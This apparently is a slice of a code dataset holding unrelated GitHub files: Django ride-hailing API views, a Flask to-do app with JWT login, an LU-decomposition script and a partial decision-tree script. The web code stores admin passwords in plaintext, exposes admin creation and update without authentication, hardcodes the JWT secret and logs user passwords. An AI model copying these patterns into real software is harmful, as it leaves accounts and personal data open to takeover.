CustomDriver.DoesNotExist:\n driver = CustomDriver(\n email=email,\n vehicle_image=vehicle_image,\n model_name=model_name,\n model_number=model_number,\n vehicle_year=vehicle_year,\n license_plate=license_plate,\n vehicle_description=vehicle_description\n )\n driver.save()\n return Response({\"message\": \"Signup successful\", \"email\": email}, status=status.HTTP_200_OK)\n\n # Update the existing driver's data\n driver.vehicle_image = vehicle_image\n driver.model_name = model_name\n driver.model_number = model_number\n driver.vehicle_year = vehicle_year\n driver.license_plate = license_plate\n driver.vehicle_description = vehicle_description\n driver.save()\n\n return Response({\"message\": \"Driver data posted.\"}, status=status.HTTP_200_OK)\n\n\nclass driverSignupView3(APIView):\n parser_classes = [MultiPartParser]\n\n def post(self, request):\n select_vehicle = request.data.get('select_vehicle')\n ac_heater = request.data.get('ac_heater')\n none = request.data.get('none')\n aadhar_card = request.FILES.get('aadhar_card')\n pan_card = request.FILES.get('pan_card')\n driving_license = request.FILES.get('driving_license')\n rc_book = request.FILES.get('rc_book')\n email = request.data.get('email')\n\n if not select_vehicle or ac_heater not in ['true', 'false'] or none not in ['true', 'false'] or not aadhar_card or not pan_card or not driving_license or rc_book is None:\n return Response({'error': 'Incomplete parameters'}, status=400)\n\n try:\n driver = CustomDriver.objects.get(email=email)\n except CustomDriver.DoesNotExist:\n driver = CustomDriver(email=email)\n\n driver.select_vehicle = select_vehicle\n driver.ac_heater = True if ac_heater.lower() == 'true' else False\n driver.none = True if none.lower() == 'true' else False\n driver.aadhar_card = aadhar_card\n driver.pan_card = pan_card\n driver.driving_license = driving_license\n driver.rc_book = rc_book\n driver.save()\n\n return Response({\"message\": \"Driver data posted.\", \"email\": email}, status=status.HTTP_200_OK)\n\n\nclass CustomDriverLoginView(ObtainAuthToken):\n def post(self, request, *args, **kwargs):\n email = request.data.get('email')\n password = request.data.get('password')\n\n try:\n driver = CustomDriver.objects.get(email=email)\n if driver.check_password(password):\n # Generate or retrieve the driver's token\n token, created = CustomDriverToken.objects.get_or_create(driver=driver)\n return Response({\"message\": \"Login Successful\", 'token': token.key})\n except CustomDriver.DoesNotExist:\n pass\n\n return Response({\"message\": \"Invalid login credentials\"}, status=status.HTTP_401_UNAUTHORIZED)\n\n\nclass CustomDriverLocationView(APIView):\n def post(self, request):\n token_value = request.data.get('token')\n if token_value is None:\n return Response({'error': 'Token not provided'}, status=status.HTTP_400_BAD_REQUEST)\n\n try:\n token = CustomDriverToken.objects.get(key=token_value)\n driver = CustomDriver.objects.get(id=token.driver_id)\n except Token.DoesNotExist:\n return Response({'error': 'Invalid token'}, status=status.HTTP_400_BAD_REQUEST)\n except CustomDriver.DoesNotExist:\n return Response({'error': 'Driver not found'}, status=status.HTTP_400_BAD_REQUEST)\n\n current_location = request.data.get('current_location', None)\n current_coordinates = request.data.get('current_coordinates', None)\n\n if current_location is None or current_coordinates is None:\n return Response({'error': 'current_location and current_coordinates are required fields.'},\n status=status.HTTP_400_BAD_REQUEST)\n\n driver.current_location = current_location\n driver.current_coordinates = current_coordinates\n driver.save()\n\n return Response(\n {'success': 'Locations saved successfully.', 'token': token_value, 'current_location': current_location, 'current_coordinates': current_coordinates}, status=status.HTTP_200_OK)\n\n\nclass GetRequestIDView(APIView):\n def post(self, request):\n token = request.data.get('token')\n current_coordinates = request.data.get('current_coordinates')\n\n driver = CustomDriverToken.objects.get(key=token)\n ride_requests = RideRequest.objects.filter(ride_status='pending')\n driver_coordinates = (float(driver.driver.current_coordinates['current_lat']), float(driver.driver.current_coordinates['current_long']))\n\n # Iterate over the ride requests and check if the distance is within 5km\n valid_requests = []\n for ride_request in ride_requests:\n user_coordinates = (float(ride_request.user.current_coordinates['current_lat']), float(ride_request.user.current_coordinates['current_long']))\n user_destination = (float(ride_request.user.destination_coordinates['dest_lat']), float(ride_request.user.destination_coordinates['dest_long']))\n if distance.distance(driver_coordinates, user_coordinates).km <= 5:\n pickup_distance = round(distance.distance(driver_coordinates, user_coordinates).km)\n destination_distance = round(distance.distance(driver_coordinates, user_destination).km)\n request_details = {\n 'request_id': ride_request.request_id,\n 'user_name': ride_request.user.full_name,\n 'current_location': ride_request.user.current_location,\n 'destination_location': ride_request.user.destination_location,\n 'pickup distance': pickup_distance,\n 'destination distance': destination_distance\n }\n valid_requests.append(request_details)\n\n # Return the list of valid request IDs\n return Response({'token': token, 'request_ids': valid_requests}, status=status.HTTP_200_OK)\n\n\nclass AcceptRequestView(APIView):\n def post(self, request):\n # Get the request ID and driver's token from the request data\n request_id = request.data.get('request_id')\n token = request.data.get('token')\n is_accepted = request.data.get('is_accepted')\n\n # Retrieve the requested ride\n try:\n ride_request = RideRequest.objects.get(request_id=request_id)\n except RideRequest.DoesNotExist:\n return Response({\"message\": \"Invalid request ID\"}, status=status.HTTP_404_NOT_FOUND)\n\n # Get the driver object using the token\n try:\n driver = CustomDriverToken.objects.get(key=token).driver\n except CustomDriverToken.DoesNotExist:\n return Response({\"message\": \"Invalid token\"}, status=status.HTTP_401_UNAUTHORIZED)\n\n if is_accepted:\n # Create a new AcceptedDriver instance for the ride request\n accepted_driver = AcceptedDriver.objects.create(\n ride_request=ride_request,\n driver=driver,\n driver_name=driver.full_name,\n driver_phone=driver.phone_number,\n driver_license_plate=driver.license_plate,\n driver_car_modelname=driver.model_name,\n )\n else:\n # Remove the ride request from accepted drivers\n AcceptedDriver.objects.filter(ride_request=ride_request, driver=driver).delete()\n\n return Response({\"message\": \"Request updated\", \"request_id\": ride_request.request_id}, status=status.HTTP_200_OK)\n\n\n@api_view(['GET'])\ndef check_request_status(request):\n # Get the driver's token from the request headers\n token = request.data.get('token')\n\n # Get the request ID from the request query parameters\n request_id = request.data.get('request_id')\n\n if not request_id:\n return Response({'error': 'Request ID not provided'}, status=status.HTTP_400_BAD_REQUEST)\n\n try:\n driver = CustomDriverToken.objects.get(key=token).driver\n except CustomDriverToken.DoesNotExist:\n return Response({'error': 'Invalid token'}, status=status.HTTP_401_UNAUTHORIZED)\n\n try:\n ride_request = RideRequest.objects.get(request_id=request_id, accepteddriver__driver=driver)\n except RideRequest.DoesNotExist:\n return Response({'message': 'Request not accepted'}, status=status.HTTP_404_NOT_FOUND)\n driver_coordinates = (\n float(driver.current_coordinates['current_lat']), float(driver.current_coordinates['current_long']))\n user_coordinates = (float(ride_request.user.current_coordinates['current_lat']),\n float(ride_request.user.current_coordinates['current_long']))\n pickup_distance = round(distance.distance(driver_coordinates, user_coordinates).km, 2)\n\n # Get additional details\n accepted_driver = AcceptedDriver.objects.get(ride_request=ride_request)\n driver_details = {\n 'name': accepted_driver.driver_name,\n 'phone': accepted_driver.driver_phone,\n 'license_plate': accepted_driver.driver_license_plate,\n 'car_modelname': accepted_driver.driver_car_modelname\n }\n\n # Prepare the response data\n response_data = {\n 'message': 'Request accepted',\n 'request_id': ride_request.request_id,\n 'pickup_distance': pickup_distance,\n 'driver_details': driver_details,\n 'current_location': ride_request.user.current_location,\n 'destination_location': ride_request.user.destination_location\n }\n\n return Response(response_data, status=status.HTTP_200_OK)\n\n\n@api_view(['POST'])\ndef driver_calculate_time(request):\n request_id = request.data.get('request_id')\n\n if not request_id:\n return Response({'error': 'Incomplete parameters'}, status=400)\n\n try:\n ride_request = RideRequest.objects.get(request_id=request_id)\n\n if ride_request.ride_status != 'Accepted':\n return Response({'error': 'Ride request has not been accepted'}, status=400)\n\n driver = ride_request.accepted_driver\n\n if not driver:\n return Response({'error': 'Accepted driver not found'}, status=400)\n\n def update_time_and_coordinates():\n driver_coordinates = driver.current_coordinates\n user_coordinates = ride_request.user.current_coordinates\n\n if not driver_coordinates or not user_coordinates:\n return\n\n driver_coords = (driver_coordinates.get('current_lat'), driver_coordinates.get('current_long'))\n user_coords = (user_coordinates.get('current_lat'), user_coordinates.get('current_long'))\n distance_km = distance.distance(driver_coords, user_coords).km\n\n average_speed = 30 # Modify the average speed value based on the driver's expected speed\n\n estimated_time = (distance_km / average_speed) * 60\n estimated_time = round(estimated_time, 2)\n\n ride_request.estimated_time = estimated_time\n ride_request.save()\n\n # Schedule the next update after 30 seconds\n threading.Timer(30, update_time_and_coordinates).start()\n\n # Start the periodic update of time and coordinates\n update_time_and_coordinates()\n\n driver_name = driver.full_name\n user_name = ride_request.user.full_name\n driver_coordinates = driver.current_coordinates\n user_coordinates = ride_request.user.current_coordinates\n\n return Response({'user_name': user_name, 'driver_name': driver_name, 'estimated_time': ride_request.estimated_time, 'driver_coordinates': driver_coordinates, 'user_coordinates': user_coordinates})\n except RideRequest.DoesNotExist:\n return Response({'error': 'Invalid Request ID'}, status=400)\n\n\n@api_view(['POST'])\ndef driver_destination_calculate_time(request):\n request_id = request.data.get('request_id')\n\n if not request_id:\n return Response({'error': 'Incomplete parameters'}, status=400)\n\n try:\n ride_request = RideRequest.objects.get(request_id=request_id)\n\n if ride_request.ride_status != 'Accepted':\n return Response({'error': 'Ride request has not been accepted'}, status=400)\n\n driver = ride_request.accepted_driver\n\n if not driver:\n return Response({'error': 'Accepted driver not found'}, status=400)\n\n user_coordinates = ride_request.user.current_coordinates\n destination_coordinates = ride_request.user.destination_coordinates\n\n if not user_coordinates or not destination_coordinates:\n return Response({'error': 'Incomplete user or destination coordinates'}, status=400)\n\n driver_coordinates = driver.current_coordinates\n\n if not driver_coordinates:\n return Response({'error': 'Driver coordinates not found'}, status=400)\n\n driver_coords = (driver_coordinates.get('current_lat'), driver_coordinates.get('current_long'))\n user_coords = (user_coordinates.get('current_lat'), user_coordinates.get('current_long'))\n destination_coords = (destination_coordinates.get('current_lat'), destination_coordinates.get('current_long'))\n estimated_time = distance.distance(user_coords, destination_coords).km / 80 # Adjust the average speed as per your requirement\n ride_completion = distance.distance(driver_coords, user_coords).km / (distance.distance(driver_coords, user_coords).km + distance.distance(user_coords, destination_coords).km) * 100 # Calculate the ride completion percentage\n price = ride_request.price # Retrieve the price from the RideRequest model\n destination_location = ride_request.user.destination_location\n\n response_data = {\n 'estimated_time': round(estimated_time, 2),\n 'ride_completion': round(ride_completion, 2),\n 'price': price,\n 'destination location':destination_location,\n }\n\n return Response(response_data, status=status.HTTP_200_OK)\n\n except RideRequest.DoesNotExist:\n return Response({'error': 'Invalid Request ID'}, status=status.HTTP_400_BAD_REQUEST)\n\n\n@api_view(['GET'])\ndef check_user_location(request):\n # Get the driver's token from the request data\n token = request.data.get('token')\n\n # Get the request ID from the request data\n request_id = request.data.get('request_id')\n\n # Get the is_located status from the request data\n is_located = request.data.get('is_located')\n\n if not request_id:\n return Response({'error': 'Request ID not provided'}, status=status.HTTP_400_BAD_REQUEST)\n\n try:\n driver = CustomDriverToken.objects.get(key=token).driver\n except CustomDriverToken.DoesNotExist:\n return Response({'error': 'Invalid token'}, status=status.HTTP_401_UNAUTHORIZED)\n\n try:\n ride_request = RideRequest.objects.get(request_id=request_id, accepteddriver__driver=driver)\n except RideRequest.DoesNotExist:\n return Response({'message': 'Request not accepted'}, status=status.HTTP_404_NOT_FOUND)\n\n if is_located == 'yes':\n # Driver has located the user\n user = ride_request.user\n response_data = {\n 'request_id': ride_request.request_id,\n 'located': 'yes',\n 'user_full_name': user.full_name,\n 'user_current_location': user.current_location,\n 'user_destination_location': user.destination_location\n }\n elif is_located == 'no':\n # Driver hasn't located the user yet\n response_data = {\n 'request_id': ride_request.request_id,\n 'located': 'no',\n 'message': 'wait'\n }\n else:\n return Response({'error': 'Invalid is_located value'}, status=status.HTTP_400_BAD_REQUEST)\n\n return Response(response_data, status=status.HTTP_200_OK)\n\n\nclass AdminView(APIView):\n def post(self, request):\n admin_name = request.data.get('admin_name')\n password = request.data.get('password')\n\n # Check if admin already exists with the provided admin_name\n try:\n admin = Admin.objects.get(admin_name=admin_name)\n return Response({\"message\": \"Admin already exists.\"}, status=status.HTTP_400_BAD_REQUEST)\n except Admin.DoesNotExist:\n pass\n\n # Create new admin object and save to database\n admin = Admin(admin_name=admin_name, password=password)\n admin.save()\n\n return Response({\"message\": \"Admin created successfully\"}, status=status.HTTP_201_CREATED)\n\n\nclass AdminLoginView(APIView):\n def post(self, request):\n admin_name = request.data.get('admin_name')\n password = request.data.get('password')\n\n try:\n admin = Admin.objects.get(admin_name=admin_name, password=password)\n except Admin.DoesNotExist:\n return Response({\"message\": \"Invalid admin credentials\"}, status=status.HTTP_401_UNAUTHORIZED)\n\n return Response({\"message\": \"Admin login successfully\", \"admin_name\": admin.admin_name, \"admin_id\": admin.id}, status=status.HTTP_200_OK)\n\n\nclass AdminUpdateView(APIView):\n def put(self, request):\n admin_id = 1 # Assuming there's only one admin with ID 1\n admin_name = request.data.get('admin_name')\n password = request.data.get('password')\n\n try:\n admin = Admin.objects.get(id=admin_id)\n admin.admin_name = admin_name\n admin.password = password\n admin.save()\n except Admin.DoesNotExist:\n return Response({\"message\": \"Admin not found\"}, status=status.HTTP_404_NOT_FOUND)\n\n return Response({\"message\": \"Admin updated successfully\"}, status=status.HTTP_200_OK)\n\n\nclass PendingDriversView(APIView):\n def get(self, request):\n pending_drivers = CustomDriver.objects.filter(status='pending')\n serializer = CustomDriverSerializer(pending_drivers, many=True)\n return Response({\"driver_details\": serializer.data}, status=status.HTTP_200_OK)\n\n\nclass DriverActivationView(APIView):\n def post(self, request):\n email = request.data.get('email')\n\n try:\n driver = CustomDriver.objects.get(email=email, status='pending')\n except CustomDriver.DoesNotExist:\n return Response({\"message\": \"Driver with pending status and provided email not found\"}, status=status.HTTP_404_NOT_FOUND)\n\n # Generate a random password\n password = ''.join(random.choices(string.ascii_letters + string.digits, k=8))\n\n # Validate the password\n try:\n validate_password(password)\n except ValidationError as e:\n return Response({\"message\": \"Invalid generated password\"}, status=status.HTTP_400_BAD_REQUEST)\n\n # Update the driver's status and save the password\n driver.status = 'activate'\n driver.set_password(password)\n driver.save()\n\n # Send email to the driver with their credentials\n send_mail(\n 'Driver Activation',\n f'Your account has been activated.\\n\\nEmail: {email}\\nPassword: {password}',\n 'from@example.com',\n [email],\n fail_silently=False,\n )\n\n return Response({\"message\": \"Driver activated and email sent\", \"email\": email}, status=status.HTTP_200_OK)\n\n\n@api_view(['GET'])\ndef total_users(request):\n total_users = CustomUser.objects.count()\n return Response({'total_users': total_users})\n\n\n@api_view(['GET'])\ndef total_drivers(request):\n total_drivers = CustomDriver.objects.count()\n return Response({'total_drivers': total_drivers})\n\n\n@api_view(['GET'])\ndef total_request_ids(request):\n total_booking = RideRequest.objects.count()\n return Response({'total_booking': total_booking})\n\n\n@api_view(['GET'])\ndef total_model_names(request):\n model_names = CustomDriver.objects.values('model_name').distinct().count()\n return Response({'total_vehicles': model_names})\n\n\n@api_view(['GET'])\ndef get_all_reviews(request):\n reviews = Review.objects.all()\n review_data = []\n\n for review in reviews:\n review_info = {\n 'driver_full_name': review.driver.full_name,\n 'note': review.note,\n 'rating': review.rating\n }\n review_data.append(review_info)\n\n return Response({'reviews': review_data})\n\n\n@api_view(['GET'])\ndef get_total_request_ids(request):\n ride_requests = RideRequest.objects.all()\n request_data = []\n\n for ride_request in ride_requests:\n driver_phone_number = ''\n if ride_request.accepted_driver:\n driver_phone_number = ride_request.accepted_driver.phone_number\n\n request_info = {\n 'model_name': ride_request.accepted_driver.model_name if ride_request.accepted_driver else '',\n 'user_current_location': ride_request.user.current_location,\n 'user_destination_location': ride_request.user.destination_location,\n 'driver_phone_number': driver_phone_number\n }\n request_data.append(request_info)\n\n total_request_ids = len(ride_requests)\n\n response_data = {\n 'Routes': request_data\n }\n\n return Response(response_data)\n","repo_name":"yasherali/BidzOn","sub_path":"bidzOn/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":47194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"12452334507","text":"from flask import Flask, send_from_directory, session, jsonify\nfrom flask_session import Session\nfrom flask_restful import Api, Resource, reqparse\nfrom flask_cors import CORS # comment this on deployment\n\n# from api.HelloApiHandler import HelloApiHandler\nfrom flask_jwt_extended import create_access_token, get_jwt, get_jwt_identity, unset_jwt_cookies, jwt_required, JWTManager\nfrom flask_restful import Api, Resource, reqparse\nfrom datetime import datetime, timedelta\nfrom pytz import all_timezones, timezone\nfrom cs50 import SQL\nfrom werkzeug.security import check_password_hash, generate_password_hash\n\nmonthsAbbrev = ['Jan', 'Feb', 'Mar', 'Apr', 'May',\n 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dic']\n\ndb = SQL(\"sqlite:///doMe.db\")\n\n\nclass HelloApiHandler(Resource):\n def get(self):\n return 'ok'\n\n @jwt_required()\n def post(self):\n print(self)\n now = datetime.now(timezone('CST6CDT'))\n parser = reqparse.RequestParser()\n parser.add_argument('type', type=str)\n args = parser.parse_args()\n requestType = args['type']\n # LOADING TASKS\n if requestType == 'load':\n print('loadingggggggg POOOOOOSSST')\n parser.add_argument('userId', type=int)\n args = parser.parse_args()\n print('HERE IS THE USER ID:', args['userId'])\n taskListYesterday = db.execute(\n \"SELECT * FROM pending_tasks WHERE year = ? AND month = ? AND day = ? AND user_id = ? ORDER BY display_index DESC\", now.year, now.month, now.day - 1, args['userId'])\n taskListToday = db.execute(\n \"SELECT * FROM pending_tasks WHERE year = ? AND month = ? AND day = ? AND user_id = ? ORDER BY display_index DESC\", now.year, now.month, now.day, args['userId'])\n taskListTomorrow = db.execute(\n \"SELECT * FROM pending_tasks WHERE year = ? AND month = ? AND day = ? AND user_id = ? ORDER BY display_index DESC\", now.year, now.month, now.day + 1, args['userId'])\n showDays = db.execute(\"SELECT show_days FROM ui_settings\")\n showDone = db.execute(\n \"SELECT show_done FROM users WHERE id = ?\", args['userId'])\n print(showDays[0]['show_days'])\n print(showDone[0]['show_done'])\n\n taskListYesterday += db.execute(\"SELECT * FROM finished_tasks WHERE year = ? AND month = ? AND day = ? AND user_id = ? ORDER BY display_index DESC\",\n now.year, now.month, now.day - 1, args['userId'])\n taskListToday += db.execute(\"SELECT * FROM finished_tasks WHERE year = ? AND month = ? AND day = ? AND user_id = ? ORDER BY display_index DESC\",\n now.year, now.month, now.day, args['userId'])\n taskListTomorrow += db.execute(\"SELECT * FROM finished_tasks WHERE year = ? AND month = ? AND day = ? AND user_id = ? ORDER BY display_index DESC\",\n now.year, now.month, now.day + 1, args['userId'])\n return {'tasks': [taskListYesterday, taskListToday, taskListTomorrow], 'showOtherDays': showDays[0]['show_days'], 'showDone': showDone[0]['show_done'], }\n # DELETING TASKS\n if requestType == 'delete':\n parser.add_argument('taskId', type=str)\n parser.add_argument('done', type=str)\n args = parser.parse_args()\n if int(args['done']):\n db.execute(\n \"DELETE FROM finished_tasks WHERE id = ?\", args['taskId'])\n else:\n db.execute(\"DELETE FROM pending_tasks WHERE id = ?\",\n args['taskId'])\n print(args['taskId'])\n return\n # LOAD HISTORY\n if requestType == 'histo':\n parser.add_argument('userId', type=int)\n args = parser.parse_args()\n print('HERE IS THE USER ID:', args['userId'])\n history = db.execute(\n 'SELECT * FROM finished_tasks WHERE user_id = ? ORDER BY id DESC', args['userId'])\n return {'history': history}\n\n # ADDING TASKS\n if requestType == 'post':\n parser.add_argument('description', type=str)\n parser.add_argument('day', type=str)\n parser.add_argument('userId', type=int)\n args = parser.parse_args()\n print(args['description'], args['day'], args['userId'])\n if args['day'] == 'tomorrow':\n day = now.day + 1\n else:\n day = now.day\n print(now.year)\n print(now.month)\n print(day)\n db.execute(\"INSERT INTO pending_tasks (display_index, description, year, month, day, user_id) VALUES (((SELECT display_index FROM pending_tasks ORDER BY display_index DESC LIMIT 1) + 1), ?, ?, ?, ?, ?)\",\n args['description'], now.year, now.month, day, args['userId'])\n return\n # TOGGLE DONE STATUS\n if requestType == 'done':\n print('the client called me')\n parser.add_argument('taskId', type=str)\n parser.add_argument('done', type=str)\n args = parser.parse_args()\n if int(args['done']) == 0:\n Tasks = db.execute(\n \"SELECT * FROM pending_tasks WHERE id = ?\", args['taskId'])\n doneTask = Tasks[0]\n print(doneTask)\n db.execute(\"INSERT INTO finished_tasks (display_index, description, year, month, day, user_id) VALUES (((SELECT display_index FROM finished_tasks ORDER BY display_index DESC LIMIT 1) + 1), ?, ?, ?, ?, ?)\",\n doneTask['description'], doneTask['year'], doneTask['month'], doneTask['day'], doneTask['user_id'])\n db.execute(\"DELETE FROM pending_tasks WHERE id = ?\",\n args['taskId'])\n else:\n Tasks = db.execute(\n \"SELECT * FROM finished_tasks WHERE id = ?\", args['taskId'])\n doneTask = Tasks[0]\n print(doneTask)\n db.execute(\"INSERT INTO pending_tasks (display_index, description, year, month, day, user_id) VALUES ((SELECT display_index FROM pending_tasks ORDER BY display_index ASC LIMIT 1) - 1, ?, ?, ?, ?, ?)\",\n doneTask['description'], doneTask['year'], doneTask['month'], doneTask['day'], doneTask['user_id'])\n db.execute(\n \"DELETE FROM finished_tasks WHERE id = ?\", args['taskId'])\n return\n # PASSING YESTERDAY'S UNFINISHED TASKS TO TODAYS LIST\n if requestType == 'pass':\n parser.add_argument('userId', type=int)\n args = parser.parse_args()\n print('Pass tasks of user:')\n print(args['userId'])\n Tasks = db.execute(\"SELECT * FROM pending_tasks WHERE year = ? AND month = ? AND day = ? AND user_id = ? ORDER BY display_index ASC\",\n now.year, now.month, now.day - 1, args['userId'])\n\n for task in Tasks:\n print(task)\n maxIndex = db.execute(\n \"SELECT display_index FROM pending_tasks WHERE year = ? AND month = ? AND day = ? ORDER BY display_index DESC LIMIT 1\", now.year, now.month, now.day)\n if maxIndex:\n new_index = maxIndex[0]['display_index'] + 1.0\n else:\n new_index = 1.0\n print(new_index)\n db.execute(\"UPDATE pending_tasks SET day = ?, display_index = ? WHERE id = ?\",\n now.day, new_index, task['id'])\n return\n # EXECUTING LIST UPDATES AFTER DRAG AND DROP\n if requestType == 'dnd':\n parser.add_argument('srcId', type=int)\n parser.add_argument('sourceIndex', type=float)\n parser.add_argument('aboveDestContent', type=bool)\n parser.add_argument('aboveDestIndex', type=float)\n parser.add_argument('destinationContent', type=bool)\n parser.add_argument('destinationIndex', type=float)\n parser.add_argument('destinationDone', type=bool)\n parser.add_argument('srcDay', type=int)\n parser.add_argument('destDay', type=int)\n parser.add_argument('belowDestContent', type=bool)\n parser.add_argument('belowDestIndex', type=float)\n parser.add_argument('belowDestDone', type=bool)\n\n args = parser.parse_args()\n\n print(args['srcId'])\n print(args['sourceIndex'])\n print(args['aboveDestContent'], args['aboveDestIndex'])\n print(args['destinationContent'],\n args['destinationIndex'], args['destinationDone'])\n print(args['belowDestContent'],\n args['belowDestIndex'], args['belowDestDone'])\n print(args['srcDay'])\n print(args['destDay'])\n\n if not args['destinationDone']:\n if args['aboveDestContent']:\n if args['destinationContent']:\n if args['srcDay'] == args['destDay'] and args['sourceIndex'] >= args['destinationIndex']:\n if args['belowDestContent'] and not args['belowDestDone']:\n new_index = (\n args['destinationIndex'] + args['belowDestIndex'])/2.0\n else:\n new_index = args['destinationIndex'] - 1\n else:\n new_index = (\n args['destinationIndex'] + args['aboveDestIndex'])/2.0\n else:\n new_index = args['aboveDestIndex'] - 1\n else:\n if args['destinationContent']:\n print('hey')\n new_index = args['destinationIndex'] + 1\n else:\n new_index = 1\n else:\n if args['aboveDestContent']:\n new_index = args['aboveDestIndex'] - 1\n else:\n new_index = 1\n\n diff = args['destDay'] - args['srcDay']\n db.execute(\"UPDATE pending_tasks SET day = ?, display_index = ? WHERE id = ?\",\n now.day - 2 + args['srcDay'] + diff, new_index, args['srcId'])\n return\n # REMEMBERING LIST DISPLAY PREFERENCES\n if requestType == 'toggleDays':\n showDays = db.execute(\"SELECT show_days FROM ui_settings\")\n db.execute(\"UPDATE ui_settings SET show_days = ?\",\n 0 if showDays[0]['show_days'] else 1)\n return\n # REMEMBERING FINISHED TASKS DISPLAY PREFERENCES\n if requestType == 'hideDone':\n parser.add_argument('userId', type=int)\n args = parser.parse_args()\n showDone = db.execute(\n \"SELECT show_done FROM users WHERE id = ?\", args['userId'])\n db.execute(\"UPDATE users SET show_done = ? WHERE id = ?\",\n 0 if showDone[0]['show_done'] else 1, args['userId'])\n print('hey heres the user: ')\n return\n # final_ret = {\"status\": \"Success\", \"message\": message}\n # print(request_type)\n # print(request_json)\n return\n\n\nclass loginApiHandler(Resource):\n def post(self):\n parser = reqparse.RequestParser()\n parser.add_argument('type', type=str)\n args = parser.parse_args()\n requestType = args['type']\n # LOGIN\n if requestType == 'login':\n print('hi from login')\n parser.add_argument('username', type=str)\n parser.add_argument('password', type=str)\n args = parser.parse_args()\n print(args['username'])\n print(args['password'])\n rows = db.execute(\n \"SELECT * FROM users WHERE username = ?\", args['username'])\n if len(rows) != 1 or not check_password_hash(rows[0][\"hash\"], args['password']):\n response = {\"msg\": \"invalid\"}\n return response\n access_token = create_access_token(identity=args['username'])\n print(access_token)\n return {\"msg\": access_token, \"id\": rows[0][\"id\"]}\n # REGISTRATION\n if requestType == 'register':\n print('hi from register')\n parser.add_argument('username', type=str)\n parser.add_argument('password', type=str)\n args = parser.parse_args()\n print(args['username'])\n print(args['password'])\n rows = db.execute(\n \"SELECT * FROM users WHERE username = ?\", args['username'])\n print('registered users')\n print(rows)\n if len(rows) != 0:\n response = jsonify({\"msg\": \"taken\"})\n return response\n # REGISTERING NEW USER\n hash = generate_password_hash(\n args['password'], method='pbkdf2:sha256', salt_length=8)\n db.execute(\n \"INSERT INTO users (username, hash) VALUES (?, ?)\", args['username'], hash)\n rows = db.execute(\n \"SELECT * FROM users WHERE username = ?\", args['username'])\n access_token = create_access_token(identity=rows[0][\"id\"])\n print(access_token)\n return {\"msg\": access_token, \"id\": rows[0][\"id\"]}\n # LOGOUT\n if requestType == 'logout':\n response = jsonify({\"msg\": \"logout successful\"})\n unset_jwt_cookies(response)\n return response\n\n\napp = Flask(__name__, static_url_path='', static_folder='react-frontend/build')\nCORS(app) # comment this on deployment\napi = Api(app)\n\napp.config[\"JWT_SECRET_KEY\"] = \"please-remember-to-change-me\"\napp.config[\"JWT_ACCESS_TOKEN_EXPIRES\"] = timedelta(hours=22)\njwt = JWTManager(app)\n\n\n@app.route(\"/\")\ndef serve():\n return \"ok\"\n\n\napi.add_resource(HelloApiHandler, '/api/tasks')\n\napi.add_resource(loginApiHandler, '/api/login')\n\n\nif __name__ == '__main__':\n app.run(port=8080)\n","repo_name":"OscarSantos1/diurnal","sub_path":"backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":14188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"27718950812","text":"import numpy as np\n\ndef LUdcmp(A):\n U = A\n L = np.eye(np.shape(A)[0])\n N = np.shape(A)[0]\n for j in range(1,N+1):\n for i in range(j+1,N+1):\n L[i-1,j-1] = U[i-1,j-1] / U[j-1,j-1]\n U[i-1,:] = U[i-1,:] - L[i-1,j-1]*U[j-1,:]\n return L,U\n\n\ndef BackSub(L, U, b):\n N = np.shape(L)[0]\n y = np.zeros((N,1))\n x = np.zeros((N,1))\n # Forward substitution\n y[0] = b[0]\n for i in range(1,N+1):\n y[i-1] = b[i-1] \n for j in range(1,i):\n y[i-1] = y[i-1] - y[j-1]*L[i-1,j-1]\n # backward substitution\n x[N-1] = y[N-1]\n for i in range(N,0,-1):\n x[i-1] = y[i-1]\n for j in range(i+1,N+1):\n x[i-1] = x[i-1] - x[j-1]*U[i-1,j-1]\n x[i-1] = x[i-1] / U[i-1,i-1]\n return x\n\n# def Singular(A):\n# (row,col) = np.shape(A)\n# for i in range(0,row):\n# for j in range(0,col):\n# if i==j:\n# if A[i,j]==0:\n# singular = True\n# return singular\n\nif __name__ == \"__main__\":\n \n A = np.array([[1,2,3],[4,6,5],[7,8,7]])\n b = np.array([1,1,2])\n \n # if Singular(A):\n # for j in range(0,np.shape(A)[1]):\n # col = list(A[:,j])\n # zero_pos = col.index(0)\n\n L, U = LUdcmp(A)\n x = BackSub(L,U,b)\n\n print(\"L\",L)\n print(\"\\n\")\n print(\"U\",U)\n print(\"\\n\")\n print(\"A:\", np.dot(L,U))\n print(\"\\n\")\n print(\"x:\",x)\n ","repo_name":"PatrickeTownsend/metodos-numericos-avanzados","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"12946971778","text":"\nimport pandas as pd\nimport numpy as np\nimport math\n\n\ndef get_decision(data):\n\t# calc total entropy\n\tpt = len(data.loc[data['rating'] == 'Positive'].index)\t\t\t# total number of positive rating\n\tnt = len(data.loc[data['rating'] == 'Negative'].index)\t\t\t# total number of negative rating\n\tif pt == 0 or nt == 0:\t\t\t\t\t\t\t# all cases have only positive or negative rating\n\t\tentropy_total = 0\n\telse:\t\t\t\t\t\t\t\t\t# all cases have both positive or negative rating\n\t\tentropy_total = -1 * (pt / (pt + nt) * math.log2(pt / (pt + nt)) + nt / (pt + nt) * math.log2(nt / (pt + nt)))\n\n\t# calc entropy and gain of each word\n\tcalculations = np.zeros(shape=[7, len(data.columns) - 1])\n\tfor col_name in data.columns:\n\t\tif col_name != 'rating':\n\t\t\tcol_index = data.columns.get_loc(col_name)\n\n\t\t\t# calc p1, n1, p0, n0\n\t\t\tcalculations[0, col_index] = len(data.loc[(data[col_name] == 1) & (data['rating'] == 'Positive')].index)\n\t\t\tcalculations[1, col_index] = len(data.loc[(data[col_name] == 1) & (data['rating'] == 'Negative')].index)\n\t\t\tcalculations[2, col_index] = len(data.loc[(data[col_name] == 0) & (data['rating'] == 'Positive')].index)\n\t\t\tcalculations[3, col_index] = len(data.loc[(data[col_name] == 0) & (data['rating'] == 'Negative')].index)\n\n\t\t\t# calc entropy at 1\n\t\t\tif calculations[0, col_index] == 0 and calculations[1, col_index] == 0:\t\t\t# no case with word = 